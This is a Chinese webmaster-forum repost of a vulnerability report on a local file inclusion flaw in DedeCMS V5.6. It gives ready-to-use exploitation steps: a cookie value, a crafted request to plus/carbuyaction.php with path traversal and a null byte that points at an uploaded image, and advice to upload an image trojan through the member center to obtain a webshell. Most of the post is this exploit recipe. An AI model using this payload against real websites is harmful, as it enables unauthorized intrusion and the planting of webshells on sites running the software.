2. 交流综合区
  3. DedecmsV5.6 本地包含漏洞

2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

DedecmsV5.6 本地包含漏洞

公共账号 管理员组
简要描述:[p=25, null, left]DEDECMS 一个很久前的文件包含漏洞,这个漏洞长达几年,跨了几个版本,网上也公开过了,不知道是厂商不懂,还是什么,就是不修复。。。很多情况直接导致拿shell[/p]详细说明:[p=25, null, left]http://www.shellsec.com/tech/3016.html

详细描述在这里。。



本地试了一下,最新版本一样可行。

首先利用cookie修改工具,加上 code=alipay

然后访问

http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00

直接包含成功



利用条件为GPC OFF ,或者某些环境下的截断。

可以在会员中心里上传个图片木马进行拿shell。

还可以包含dede自身文件进行更多利用,这里就不详细了。



[/p]漏洞证明:
[p=25, null, left]http://www.wooyun.org/upload/201303/29122935fd4c195d2a2fbd6196b9877f62f55cd4.jpg[/p]
站长窝论坛版权声明 1、本帖标题:DedecmsV5.6 本地包含漏洞
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由公共账号在站长窝论坛《交流综合区》版块原创发布, 转载请注明出处!
收藏的用户(0 X
正在加载信息~
上一篇:Dedecms会员中心album_add.php页面SQL注入漏洞
下一篇:滚动边栏图墙 多位置增强 yewumeng.htm JS/Kryptik.K 特洛伊木马
评论
最新回复 (1)
返回
发新帖
作者最近主题
相关贴子